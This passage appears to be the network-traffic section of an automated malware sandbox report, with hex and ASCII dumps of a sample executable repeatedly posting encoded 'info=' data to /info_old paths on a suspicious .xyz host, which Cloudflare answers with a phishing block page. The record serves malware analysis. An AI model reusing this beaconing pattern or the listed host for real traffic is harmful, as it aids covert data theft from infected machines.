63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
                                                                                                                                                    Jan 29, 2021 17:36:49.311407089 CET184INData Raw: 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63
                                                                                                                                                    Data Ascii: ent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cg
                                                                                                                                                    Jan 29, 2021 17:36:49.311429977 CET185INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a
                                                                                                                                                    Jan 29, 2021 17:36:49.311451912 CET186INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63
                                                                                                                                                    Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
                                                                                                                                                    Jan 29, 2021 17:36:49.311466932 CET186INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.649730104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:36:46.738434076 CET175OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:46.738558054 CET175OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 55 64 32 44 42 50 43 42 37 41 44 44 6f 33 57 55 36 55 50 67 67 38 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVUd2DBPCB7ADDo3WU6UPgg8~
                                                                                                                                                    Jan 29, 2021 17:36:46.807162046 CET176INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d44c674e9b268f9729bc63b270c11e6fb1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2c360000fa887a3a9000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bgeVqZANOyLARbubF49VtUP%2BZDvlFHU2EXWwvnYQLx41IuECCf6Iv3nEhozobRthbuUQtu8HTzOt4czKuTC7xmyu3fCffsHgriO5TJhL669K9MECjQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fc05ce6fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
                                                                                                                                                    Jan 29, 2021 17:36:46.807198048 CET178INData Raw: 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73
                                                                                                                                                    Data Ascii: ntent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-
                                                                                                                                                    Jan 29, 2021 17:36:46.807224989 CET179INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be
                                                                                                                                                    Jan 29, 2021 17:36:46.807250023 CET180INData Raw: 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72
                                                                                                                                                    Data Ascii: > </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <sp
                                                                                                                                                    Jan 29, 2021 17:36:46.807271957 CET180INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:55.304384947 CET187OUTPOST /info_old/e HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 677
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:55.304445028 CET188OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 57 38 59 47 58 55 47 63 4a 56 39 58 51 4b 71 76 58 43 49 31 41 6d 57 44 42 4a 6a 34 55 2d 67 31 57 4b 52 76 6e 78 54 73 63 77 64 75 46 54 32 42 66 43 58 67 67 30 68 37 53 78 71 61 74 6c 61 33 6e 67 38
                                                                                                                                                    Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL-MPhpTNUsvoyOqifmBCVQiT6Y7NpBzPsi912F8WNCFScT8b-uWJRUCEPgr_QY2cinQd9sNw2c_3TQDzSqhX4WKYPwaiFyLCUTMojROHTa1EECTRm3aGKyWGwr5K8DJV4r30i
                                                                                                                                                    Jan 29, 2021 17:36:55.358536005 CET190INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:55 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a4daf0000fa8808379000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DszwcFU1azWQLn01RElxOwnV2O2Ueli9QIC2IbMyKMQVDlZD5IjdcVbfh5UvCbSQdvehZMIYHKVW8KDBGHU1n7v6nJ75mb0b7%2Bh73mH%2B0VSgQPaReA%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ff5ecddfa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:55.358561039 CET191INData Raw: 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c
                                                                                                                                                    Data Ascii: content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cd
                                                                                                                                                    Jan 29, 2021 17:36:55.358577013 CET192INData Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to b
                                                                                                                                                    Jan 29, 2021 17:36:55.358596087 CET193INData Raw: 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74
                                                                                                                                                    Data Ascii: iv> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <
                                                                                                                                                    Jan 29, 2021 17:36:55.358608961 CET193INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:55.381866932 CET194OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:55.382005930 CET194OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 59 78 79 52 74 30 2d 55 66 67 31 55 39 49 4e 49 4d 43 39 70 39 77 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVYxyRt0-Ufg1U9INIMC9p9w~
                                                                                                                                                    Jan 29, 2021 17:36:55.432903051 CET196INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:55 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a4dfa0000fa8830063000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=D9fwJOS8pZebGFQq7B6FJLaQ%2FmcNDipyadybgDD7L1SKN97VSbKQsHKdxwBNnl3D2%2FOx1sH34jEiZYb1VtlFnHKk09yuid%2F54wWWzO9I6f6a3y5cJQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ff65de5fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
                                                                                                                                                    Jan 29, 2021 17:36:55.432929039 CET197INData Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74
                                                                                                                                                    Data Ascii: " content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
                                                                                                                                                    Jan 29, 2021 17:36:55.433439970 CET199INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to
                                                                                                                                                    Jan 29, 2021 17:36:56.186005116 CET223OUTPOST /info_old/g HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 1393
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:56.186244011 CET224OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 57 38 59 47 58 55 47 63 4a 56 39 58 51 4b 71 76 58 43 49 31 41 6d 57 44 42 4a 6a 34 55 2d 67 31 57 4b 52 76 6e 78 54 73 63 77 64 75 46 54 32 42 66 43 58 67 67 30 68 37 53 78 71 61 74 6c 61 33 6e 67 38
